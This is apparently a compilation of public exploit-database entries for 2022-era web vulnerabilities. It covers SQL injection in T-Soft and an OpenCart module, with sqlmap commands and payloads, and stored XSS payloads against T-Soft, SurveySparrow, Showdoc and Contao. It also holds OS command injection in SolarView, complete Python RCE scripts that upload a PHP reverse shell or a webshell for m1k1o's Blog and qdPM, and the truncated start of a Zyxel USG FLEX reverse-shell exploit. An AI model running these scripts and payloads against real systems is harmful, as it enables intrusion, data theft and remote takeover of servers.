# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# CVE: 2022-28132
# Date: 18.02.2022
######## Description ###########################################
#
#
#
# Step-1: Login as Admin or with privilage user
# Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path
# Step-3: Capture the request save as .txt
# Step-4: Run SQLMAP with this command: 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment --random-agent'
# Step-5: Now you will be able to see the databases; for more, search 'how to use sqlmap advance'
#
# Impact: An attacker can read what is stored in the database, which is a high-impact issue, and could steal data...
#
#
#
######## Proof of Concept ########################################
========>>> REQUEST <<<=========
GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=
&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2
Host: domain.com
Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://domain.com/srv/admin/products/products-v2/index
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
=============> RESULTS OF THE SQLMAP <==========================
Parameter: SatisAlt (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0¥i=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20
---
back-end DBMS: MySQL 5
available databases [2]:
[*] d25082_db
[*] information_schema
[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
# Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alperen Ergel (alpernae IG/TW)
# Web Site: https://alperenae.gitbook.io/
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# Date: 2022-05-10
# CVE :N/A
######## Description ########
#
# 1-) Log in to the administrator page and add a product
#
# 2-) Set the product name to the XSS payload
#
# 3-) Go back to the web site; the payload will then execute
#
#
######## Proof of Concept ########
========>>> REQUEST <<<=========
POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1
Host: domain.com
Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1028
Origin: https://domain.com
Dnt: 1
Referer: https://domain.com/srv/admin/products/save-edit/index?id=12
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100
&StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0
&KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false
&Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi=
&TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw=
&Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20
izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com%
2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0
&UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0
# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
# Date: May 11 2022
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: https://surveysparrow.com/
# Software Link: https://surveysparrow.com/enterprise-survey-software/
# Version: 2022
# Tested on: Windows
# CVE : CVE-2022-29727
# References:
https://www.tenable.com/cve/CVE-2022-29727
https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022
#POC
For Stored XSS
Visit
https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
XSS Executed
# Exploit Title: SolarView Compact 6.0 - OS Command Injection
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29303
# Tested on: Windows
# Exploit
# HTTP Request :
POST /conf_mail.php HTTP/1.1
Host: HOST_IP
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://HOST_IP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://HOST_IP/conf_mail.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M
# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967
Description: Stored XSS via uploading a file in .ofd format
1. Create a file with .ofd extension and add XSS Payload inside the file
filename = "payload.ofd"
payload = "<script>alert(1)</script>"
2. Login to showdoc v2.10.2 and go to file library
Endpoint = "https://www.site.com/attachment/index"
3. Upload the payload on file library and click on the check button
4. The XSS payload will be executed once the URL is visited
# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi
# Date: 19/05/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez
# Version: v.3.0.2.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz
* Description :
The Newsletter Module, which is compatible with any OpenCart installation, allows SQL Injection via the parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter
- Save request in BurpSuite
- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
Request :
===========
POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 29
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: Keep-alive
zemez_newsletter_email=saud
===========
Output :
Parameter: zemez_newsletter_email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK
# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 04/28/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://contao.org/en/
# Software Link: https://github.com/contao/contao/releases/tag/4.13.2
# Version: [ 4.13.2 ]
# Tested on: [KALI OS]
# CVE : CVE-2022-1588
# References:
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html
---------------
Steps to reproduce:
Navigate to the below URL
URL: https://localhost/contao/"><svg//onload=alert(112233)>
# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-01-06
# Exploit Author: Malte V
# Vendor Homepage: https://github.com/m1k1o/blog
# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Version: 1.3 and below
# Tested on: Linux
# CVE : CVE-2022-23626
import argparse
import json
import re
from base64 import b64encode
import requests as req
from bs4 import BeautifulSoup
# Command-line options for the PoC. Every option has a default, so with no
# arguments the script targets localhost:8081 with placeholder credentials.
parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',
                    required=False)
parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,
                    required=False)
parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,
                    required=False)
parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)
args = vars(parser.parse_args())
username = args['username']
password = args['password']
lhost_ip = args['ip']
lhost_port = args['lport']
address = args['url']
port = args['port']
url = f"http://{address}:{port}"
# Module-level state, filled in later by get_cookie() / grep_csrf() /
# set_exploit_file_name() through `global` statements.
blog_cookie = ""
csrf_token = ""
exploit_file_name = ""
# NOTE: evaluated once at import time, while csrf_token and blog_cookie are
# still empty, so the values baked into this dict are the empty strings.
# Only call_malicious_php() names it (via `global header`) and it never reads
# it; the request functions below build their own header dicts instead.
header = {
    "Host": f"{address}",
    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "X-Requested-With": "XMLHttpRequest",
    "Csrf-Token": f"{csrf_token}",
    "Cookie": f"PHPSESSID={blog_cookie}"
}
def get_cookie(complete_url: str) -> None:
    """Fetch *complete_url* and record the PHPSESSID the server issues.

    Side effects: on an HTTP 200 reply the module global ``blog_cookie`` is
    set from the response cookies and the response is handed to
    grep_csrf(), which sets ``csrf_token``. Nothing is returned.
    Raises KeyError if the 200 reply carries no PHPSESSID cookie.
    """
    global blog_cookie
    cookie_header = {}
    # This branch is only taken while no session id is known yet, so the
    # Cookie header sent here carries an empty PHPSESSID value.
    if not blog_cookie:
        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
    result = req.get(url=complete_url, headers=cookie_header)
    if result.status_code == 200:
        blog_cookie = result.cookies.get_dict()['PHPSESSID']
        print(f'[+] Found PHPSESSID: {blog_cookie}')
        grep_csrf(result)
def grep_csrf(result) -> None:
    """Pull the CSRF token out of the page's second ``<script>`` element.

    The token is taken to be the first run of exactly ten lowercase hex
    characters in that script's text and is stored in the module global
    ``csrf_token``.
    Raises IndexError when the page has fewer than two script tags and
    AttributeError when the regex does not match.
    """
    global csrf_token
    csrf_regex = r"[a-f0-9]{10}"
    soup = BeautifulSoup(result.text, 'html.parser')
    # Index 1 = the second <script> on the page; assumed to inline the token.
    script_tag = str(soup.findAll('script')[1].contents[0])
    csrf_token = re.search(csrf_regex, script_tag).group(0)
    print(f'[+] Found CSRF-Token: {csrf_token}')
def login(username: str, password: str) -> None:
    """Obtain a session and CSRF token, then log in through ``/ajax.php``.

    Args:
        username: sent as the ``nick`` form field.
        password: sent as the ``pass`` form field.
    Both values are interpolated into the body string as-is (no URL
    encoding). The result is only reported on stdout, keyed on the
    ``logged_in`` flag of the JSON reply; the session state stays in the
    module globals ``blog_cookie`` and ``csrf_token``.
    """
    get_cookie(url)
    login_url = f"{url}/ajax.php"
    login_data = f"action=login&nick={username}&pass={password}"
    login_header = {
        "Host": f"{address}",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "X-Requested-With": "XMLHttpRequest",
        "Csrf-Token": f"{csrf_token}",
        "Cookie": f"PHPSESSID={blog_cookie}"
    }
    result = req.post(url=login_url, headers=login_header, data=login_data)
    # The reply is JSON; BeautifulSoup's .text is used only to get the raw
    # body text before json.loads().
    soup = BeautifulSoup(result.text, 'html.parser')
    login_content = json.loads(soup.text)
    if login_content.get('logged_in'):
        print('[*] Successful login')
    else:
        print('[!] Bad login')
def set_cookie(result) -> None:
    """Store the PHPSESSID cookie of *result* in the module global.

    Not called anywhere in this listing; get_cookie() does the same
    assignment inline. Raises KeyError if the cookie is absent.
    """
    global blog_cookie
    blog_cookie = result.cookies.get_dict()['PHPSESSID']
def generate_payload(command: str) -> str:
    """Return a hand-built multipart/form-data body for the upload request.

    The body has one part: a file named ``malicious.gif.php`` declared as
    ``application/x-httpd-php``, whose content is a ``GIF`` magic prefix
    followed by PHP that runs *command* (base64-encoded here, decoded on the
    server). The boundary string must match the Content-Type header that
    send_payload() sends alongside this body.

    Defender's note: the double extension, the PHP part type and the
    base64-wrapped ``system()`` call are what an upload filter or WAF can
    key on; the actual fix is an extension allow-list on upload and not
    serving uploaded files from a PHP-executing directory (CVE-2022-23626).
    """
    return f"""
-----------------------------13148889121752486353560141292
Content-Disposition: form-data; name="file"; filename="malicious.gif.php"
Content-Type: application/x-httpd-php
GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;
-----------------------------13148889121752486353560141292--
"""
def send_payload() -> None:
    """Upload the PHP file through ``/ajax.php?action=upload_image``.

    Uses the module globals ``csrf_token`` and ``blog_cookie`` collected by
    login(). The embedded command is a PHP one-liner that connects back to
    ``lhost_ip:lhost_port`` and attaches ``/bin/bash`` to that socket. The
    request is routed through an HTTP proxy on 127.0.0.1:8080 and the
    response body is passed to set_exploit_file_name() to learn the name the
    server stored the file under.
    """
    payload_header = {
        "Host": f"{address}",
        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "X-Requested-With": "XMLHttpRequest",
        "Csrf-Token": f"{csrf_token}",
        "Cookie": f"PHPSESSID={blog_cookie}"
    }
    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"
    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
    payload = generate_payload(command)
    print(f"[+] Upload exploit")
    # proxies= pins the request to a local intercepting proxy; the call fails
    # if nothing listens on 127.0.0.1:8080.
    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})
    set_exploit_file_name(result.content.decode('ascii'))
def set_exploit_file_name(data: str) -> None:
    """Extract the server-side file name from the upload response text.

    Matches 4-5 alphanumerics followed by any character and ``php`` (the
    dot in the pattern is unescaped) and stores the match in the module
    global ``exploit_file_name``. Raises AttributeError on no match.
    """
    global exploit_file_name
    file_regex = r"[a-zA-Z0-9]{4,5}.php"
    exploit_file_name = re.search(file_regex, data).group(0)
def call_malicious_php(file_name: str) -> None:
    """GET ``/data/i/<file_name>`` so the server executes the uploaded PHP.

    ``global header`` is declared but the dict is not used here, and the
    response is discarded. For defenders, the request path
    ``/data/i/<random>.php`` is the indicator to look for in access logs.
    """
    global header
    complete_url = f"{url}/data/i/{file_name}"
    print('[*] Calling reverse shell')
    result = req.get(url=complete_url)
def check_reverse_shell():
    """Ask interactively whether a listener is ready.

    Returns True for any of ``yes``/``y``/``ye``/empty input, False for
    ``no``/``n`` (after printing the suggested listener command). Any other
    answer falls off the end and returns None, which main() treats as
    falsy.
    """
    yes = {'yes', 'y', 'ye', ''}
    no = {'no', 'n'}
    choice = input("Have you got an active netcat listener (y/Y or n/N): ")
    if choice in yes:
        return True
    elif choice in no:
        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
        return False
def main() -> None:
    """Run the three steps in order: login, upload, trigger.

    Skipped entirely unless check_reverse_shell() returned a truthy value.
    """
    enabled_listener = check_reverse_shell()
    if enabled_listener:
        login(username, password)
        send_payload()
        call_malicious_php(exploit_file_name)
# Script entry point; argument parsing already ran at import time above.
if __name__ == "__main__":
    main()
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution
# Exploit modification: RedHatAugust
#!/usr/bin/python3
import sys
import requests
from lxml import html
from argparse import ArgumentParser
# One shared session so the login cookie set in main() is reused by req().
session_requests = requests.session()
def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
    """Build the multipart form for a ``myAccount/update`` request.

    Every value is a ``(None, text)`` tuple so that requests' ``files=``
    argument sends each field as a plain multipart part. ``userid``,
    ``username`` and ``csrftoken_`` are the xpath result lists from main();
    their last element is used. ``uservar`` lands in ``users[photo_preview]``
    together with ``users[remove_photo]='1'`` — the callers pass ``.htaccess``
    style paths here, which is the path-traversal half of the issue named in
    the header (CVE-2020-7246). ``HOSTNAME`` is accepted but not used.

    Returns: the dict to pass as ``files=``.
    """
    request_1 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, uservar),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[remove_photo]': (None, '1'),
    }
    return request_1
def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
    """Send the three ``myAccount/update`` posts that make up the attack.

    1. photo_preview=``.htaccess`` with remove_photo=1
    2. photo_preview=``../.htaccess`` with remove_photo=1
    3. a ``users[photo]`` upload named ``backdoor.php`` containing a PHP
       ``system($_REQUEST['cmd'])`` stub.
    The first two presumably make the app delete the .htaccess that would
    otherwise block PHP in the upload directory (inferred from the header's
    "Path Traversal + RCE"; not verifiable from this code). Responses are
    assigned but never inspected; nothing is returned.

    Defender's note: a profile-update request whose ``photo_preview`` field
    holds a dotfile or ``../`` segment, or whose photo upload has a ``.php``
    name, is the thing to reject server side and to alert on in logs.
    """
    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)
    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)
    request_3 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, ''),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),
    }
    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
    """Log in, run req(), then locate the uploaded file in the listing.

    Args:
        HOSTNAME: base URL. It is concatenated with both ``/index.php/...``
            and ``index.php/...`` below, so it is presumably expected to end
            with a slash — TODO confirm.
        EMAIL, PASSWORD: credentials of any account that has a myAccount
            page (the comment below says the built-in admin does not).
    After the upload, ``uploads/users/`` is fetched and scanned line by
    line for ``backdoor.php``; the newest entry by the date text between
    ``"right"`` and `` </td`` wins. Relies on that directory being listable
    (inferred). ``count``, ``get_file`` and ``final_tree`` are unused.
    """
    url = HOSTNAME + '/index.php/login'
    result = session_requests.get(url)
    #print(result.text)
    login_tree = html.fromstring(result.text)
    # set() dedups repeated hidden inputs; any one token value is fine.
    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}
    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
    # The designated admin account does not have a myAccount page
    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
    account_tree = html.fromstring(account_page.content)
    userid = account_tree.xpath("//input[@name='users[id]']/@value")
    username = account_tree.xpath("//input[@name='users[name]']/@value")
    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
    final_tree = html.fromstring(get_file.content)
    backdoor = requests.get(HOSTNAME + "uploads/users/")
    count = 0
    dateStamp = "1970-01-01 00:00"
    backdoorFile = ""
    for line in backdoor.text.split("\n"):
        count = count + 1
        if "backdoor.php" in str(line):
            try:
                start = "\"right\""
                end = " </td"
                line = str(line)
                # String comparison of "YYYY-MM-DD HH:MM" text; works because
                # the format is zero-padded and most-significant-first.
                dateStampNew = line[line.index(start)+8:line.index(end)]
                if (dateStampNew > dateStamp):
                    dateStamp = dateStampNew
                    print("The DateStamp is " + dateStamp)
                    backdoorFile = line[line.index("href")+6:line.index("php")+3]
            except:
                # Bare except: any parse failure on a listing line is skipped.
                print("Exception occurred")
                continue
    #print(backdoor)
    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')
# Script entry point: parse -url/-u/-p and run main() only when all three are
# present; otherwise print the help text.
if __name__ == '__main__':
    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")
    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')
    parser.add_argument('-p', '--password', dest='password', help='User password')
    args = parser.parse_args()
    # Added detection if the arguments are passed and populated, if not display the arguments
    if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):
        main(args.hostname, args.email, args.password)
    else:
        parser.print_help()
# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse
# Options are parsed at import time; main() checks that none is missing.
parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")
args = parser.parse_args()
# Base64-encoded ASCII-art banner, decoded and printed by main().
banner = (
    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
    "biA6KSApCg=="
)
def main() -> None:
    """Validate the options, normalise the URL and call exploit().

    Exits with the help text if any of -u/-r/-p is missing. A URL without
    ``http`` in it gets ``https://`` prepended; the vulnerable handler path
    ``/ztp/cgi-bin/handler`` is always appended.
    """
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    if None in vars(args).values():
        print(f"[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()
    if "http" not in args.url:
        args.url = "https://" + args.url
    args.url += "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)
